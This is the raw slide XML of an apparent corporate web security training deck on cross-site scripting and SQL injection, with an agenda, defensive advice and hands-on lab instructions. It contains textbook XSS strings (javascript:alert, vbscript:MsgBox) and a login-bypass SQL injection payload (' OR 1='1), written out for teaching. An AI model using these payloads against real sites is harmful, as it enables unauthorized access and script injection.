            <a:ext cx="9144000" cy="25667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9792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General XSS Defenses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b="1" dirty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Beware of protocol schemes</a:t>
            </a:r>
          </a:p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Always check whether or not a URL starts with the correct protocols, ex: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty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http</a:t>
            </a:r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://” or “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" b="1" dirty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https</a:t>
            </a:r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://”</a:t>
            </a:r>
          </a:p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If the following strings are included in the URL part of a web page (ex: &lt;a&gt; tag), XSS might be triggered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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javascript:alert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(“hello”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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vbscript:MsgBox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(“hello”);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about:&lt;script&gt;alert(“hello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  <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t>”);&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック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7583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General XSS Defenses for DOM based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XSS payload that triggers in DOM usually does not get to the server, thus cannot be sanitized in the server side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Avoid putting important functions in client side code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Sanitization of the client side code and handle references to DOM objects that could pose threats carefully</a:t>
            </a:r>
          </a:p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Example of DOM XSS</a:t>
            </a:r>
          </a:p>
          <a:p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  <a:p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  <a:p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  <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr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  <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reference: Rakuten Security Guideline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://confluence.rakuten-it.com/confluence/x/w8RNRg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p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3657600"/>
            <a:ext cx="7429500" cy="1003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42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err="1" smtClean="0"/>
              <a:t>whoami</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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6406" y="620496"/>
            <a:ext cx="8231187" cy="54752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800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1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r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ChiaLung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> ”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800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Albert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>" Hsieh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Security Training Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean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en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>@ ISEO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>training planning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>and delivery, security promotion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, vulnerability testing, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック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0270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Reference - OWASP Top 10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A3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" altLang="ja-JP" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r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 Cross-Site Scripting</a:t>
            </a:r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Preventions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Escape all HTML context inputs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Server side input whitelisting</a:t>
            </a:r>
          </a:p>
          <a:p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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>OWASP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: https://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www.owasp.org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/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index.php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/Top_10_2013-A3-Cross-Site_Scripting_(XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>XSS Prevention Cheat Sheet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: https://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www.owasp.org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/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index.php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/XSS_(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Cross_Site_Scripting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)_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Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000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10/22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5450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Hands On Time</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" alt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altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>A vulnerable web site with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" b="1" dirty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5 stages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is given</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>You can proceed when XSS is successfully exploited</a:t>
            </a:r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22/22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2483934"/>
            <a:ext cx="7658100" cy="3340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7697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Hands On Time</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP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132012"/>
            <a:ext cx="3963987" cy="3963987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 bwMode="auto">
          <a:xfrm>
            <a:off x="4192587" y="2132836"/>
            <a:ext cx="4722814" cy="2210564"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -66272"/>
              <a:gd name="adj2" fmla="val 28679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79287" y="2035076"/>
            <a:ext cx="48647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Your journey starts at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://LabIP:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="3600" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eef4a6d53c97b055136de86e412b42ac</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" u="sng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altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>14:40 ~ 15:10 : Lab time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="da-DK" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>15:10 ~ 15:20 : Solution</a:t>
            </a:r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22/22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F683E7A-DA99-404A-A81E-E832AC6CC6F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3966407" y="4940856"/>
            <a:ext cx="4719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Check the Lab Info in Box!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1378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143000"/>
            <a:ext cx="624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Break Time !!!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2158663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14:10 ~ 14:25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1" y="2362200"/>
            <a:ext cx="4114799" cy="41147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190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2667000"/>
            <a:ext cx="533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SQL Injection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01/31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FE6AA3C-1ADD-4EE6-B5FB-F79AEC76B3F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4267200" y="3657600"/>
            <a:ext cx="472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&lt;14:30 ~ 15:30&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>14:30 ~ 14:50 : Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>14:50 ~ 15:20 : Hands on lab</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>15:20 ~ 15:30 : Solution sharing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2569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What is SQL Injection?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000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2432537"/>
            <a:ext cx="3161295" cy="35814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4267200" y="1066801"/>
            <a:ext cx="4516800" cy="3124199"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -70369"/>
              <a:gd name="adj2" fmla="val 40660"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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60629" y="1360944"/>
            <a:ext cx="42261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rPr>
              <a:t>SQL Injection:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="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rPr>
              <a:t>Ability to execute arbitrary SQL queries in the victim server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02/31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1585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The very basic SQL query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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>column</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>condition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03/31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1993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Behind the login function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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘admin’ AND password=‘password’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04/31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6431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Behind the login function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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r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4953000" y="2362200"/>
            <a:ext cx="3960042" cy="1447800"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -29915"/>
              <a:gd name="adj2" fmla="val 95012"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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81600" y="2477804"/>
            <a:ext cx="47957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User inputs, if not properly escaped..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05/31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2457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Bypassing the login with SQLi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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘admin’ AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR 1=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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06/31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4790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Agenda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000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>13:00 ~ 13:20: Training Introduction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>13:20 ~ 14:20: XSS(Cross-site scripting)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13:20 ~ 13:40: Introduction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13:40 ~ 14:10: Hands on labs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14:10 ~ 14:20: Solution sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>14:20 ~ 14:30: Break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>14:30 ~ 15:30: SQL injection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14:30 ~ 14:50: Introduction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14:50 ~ 15:20: Hands on labs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15:20 ~ 15:30: Solution sharing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>15:30 ~ 15:40: Break</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>15:40 ~ 16:20: Challenge time !!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>16:20 ~ 16:30: Solution sharing, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Q&amp;A, Survey</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック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1968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Bypassing the login with SQLi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000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90483"/>
            <a:ext cx="4456857" cy="278171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3505200" y="914400"/>
            <a:ext cx="5505994" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43216"/>
              <a:gd name="adj2" fmla="val 100856"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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7600" y="1028283"/>
            <a:ext cx="52063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That was it! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You’ve mastered SQL Injection!!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07/31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7241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Bypassing the login with SQLi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000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90483"/>
            <a:ext cx="4456857" cy="278171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 bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="914400"/>
            <a:ext cx="5505994" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -43216"/>
              <a:gd name="adj2" fmla="val 100856"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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7600" y="1028283"/>
            <a:ext cx="52063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As long as the SQL syntax is correct, you can do anything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07/31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2961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Question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791" y="1704640"/>
            <a:ext cx="3677318" cy="3677318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4331051" y="1984798"/>
            <a:ext cx="4782469" cy="1558501"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57375"/>
              <a:gd name="adj2" fmla="val 17184"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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2133600"/>
            <a:ext cx="4648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rPr>
              <a:t>Is there a single byte </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="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rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="3200" dirty="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rPr>
              <a:t>to detect SQL injection?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08/31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7041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Detecting SQLi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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘admin’ AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ OR 1=‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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09/31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80152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Detecting SQLi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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘admin’ AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r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3200400" y="1852986"/>
            <a:ext cx="5383394" cy="2261814"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -25855"/>
              <a:gd name="adj2" fmla="val 108474"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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09437" y="2199063"/>
            <a:ext cx="52123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This evil single quote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will violates the SQL syntax and…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10/31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00558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In the case of Login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000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524000"/>
            <a:ext cx="8250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SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>COUNT(*) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0"/>
              <a:t>WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username=‘admin’ AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’</a:t>
            </a:r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4114800" y="1852986"/>
            <a:ext cx="4468994" cy="2261814"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -41482"/>
              <a:gd name="adj2" fmla="val 102410"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7030A0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53857" y="2199063"/>
            <a:ext cx="373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Our evil single </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Quote, which violates the syntax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603" y="2087790"/>
            <a:ext cx="8530877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11/31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23990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2682738"/>
            <a:ext cx="3161295" cy="35814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Blind SQL Injection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990600" y="1143000"/>
            <a:ext cx="7924799" cy="1524000"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -30453"/>
